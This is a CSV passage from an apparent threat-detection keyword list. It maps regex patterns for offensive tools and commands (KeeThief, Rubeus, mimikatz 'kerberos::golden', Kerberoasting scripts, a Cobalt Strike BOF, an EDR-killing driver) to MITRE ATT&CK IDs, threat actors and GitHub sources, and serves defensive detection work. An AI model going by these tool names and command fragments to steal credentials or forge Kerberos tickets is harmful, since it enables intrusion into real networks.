"*KeeTheft/Dinvoke*",".{0,1000}KeeTheft\/Dinvoke.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","N/A","private github repo","10","","N/A","","","","50291"
"*KeeThief*",".{0,1000}KeeThief.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","50292"
"*KeeThief.*",".{0,1000}KeeThief\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50293"
"*KeeThief.ps1*",".{0,1000}KeeThief\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50294"
"*KeeThiefSyscalls*",".{0,1000}KeeThiefSyscalls.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","N/A","private github repo","10","","N/A","","","","50295"
"*keethief-syscalls*",".{0,1000}keethief\-syscalls.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","50296"
"*keowu/BadRentdrv2*",".{0,1000}keowu\/BadRentdrv2.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","1","N/A","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","50298"
"*KerbDump\*-Tickets-KerbDump.txt*",".{0,1000}KerbDump\\.{0,1000}\-Tickets\-KerbDump\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","50299"
"*kerberoast /*",".{0,1000}kerberoast\s\/.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","50300"
"*kerberoast /*",".{0,1000}kerberoast\s\/.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","50301"
"*Kerberoast Attack - Services Configured With a Weak Password*",".{0,1000}Kerberoast\sAttack\s\-\sServices\sConfigured\sWith\sa\sWeak\sPassword.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","50302"
"*Kerberoast -username *",".{0,1000}Kerberoast\s\-username\s.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","50303"
"*Kerberoast(*",".{0,1000}Kerberoast\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","50304"
"*kerberoast(self)*",".{0,1000}kerberoast\(self\).{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","50305"
"*Kerberoast.*",".{0,1000}Kerberoast\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","50306"
"*kerberoast.py*",".{0,1000}kerberoast\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","50307"
"*Kerberoast.py*",".{0,1000}Kerberoast\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","50308"
"*kerberoast.py*",".{0,1000}kerberoast\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","1","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","50309"
"*kerberoast_attack*",".{0,1000}kerberoast_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50310"
"*kerberoast_blind_output_*",".{0,1000}kerberoast_blind_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50311"
"*kerberoast_john_results_*",".{0,1000}kerberoast_john_results_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50312"
"*kerberoastables.txt*",".{0,1000}kerberoastables\.txt.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","N/A","5","442","63","2024-12-16T07:32:14Z","2021-08-02T20:19:35Z","50313"
"*kerberoasting*",".{0,1000}kerberoasting.{0,1000}","offensive_tool_keyword","OSCP-Cheatsheets","kerberoasting keyword. attack that allows any domain user to request kerberos tickets from TGS that are encrypted with NTLM hash of the plaintext password of a domain user account that is used as a service account (i.e account used for running an IIS service) and crack them offline avoiding AD account lockouts.","T1558 - T1208 - T1003 - T1110","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tool","https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md","1","1","N/A","N/A","N/A","1","96","36","2019-09-09T22:07:47Z","2019-09-12T22:07:31Z","50314"
"*kerberoasting.boo*",".{0,1000}kerberoasting\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","50315"
"*kerberoasting.x64*",".{0,1000}kerberoasting\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50316"
"*KerberOPSEC.csproj*",".{0,1000}KerberOPSEC\.csproj.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","50317"
"*KerberOPSEC.exe*",".{0,1000}KerberOPSEC\.exe.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","50318"
"*KerberOPSEC-x64.exe*",".{0,1000}KerberOPSEC\-x64\.exe.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","50319"
"*KerberOPSEC-x86.exe*",".{0,1000}KerberOPSEC\-x86\.exe.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","50320"
"*Kerberos abuse (kerbeus BOF)*",".{0,1000}Kerberos\sabuse\s\(kerbeus\sBOF\).{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50321"
"*kerberos*.kirbi*",".{0,1000}kerberos.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","10","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","50322"
"*kerberos/decryptor.py*",".{0,1000}kerberos\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","50323"
"*kerberos::ask*",".{0,1000}kerberos\:\:ask.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50324"
"*kerberos::clist*",".{0,1000}kerberos\:\:clist.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50325"
"*kerberos::golden *.kirbi*",".{0,1000}kerberos\:\:golden\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","50326"
"*kerberos::golden /service:*",".{0,1000}kerberos\:\:golden\s\/service\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","50327"
"*kerberos::golden*",".{0,1000}kerberos\:\:golden.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50328"
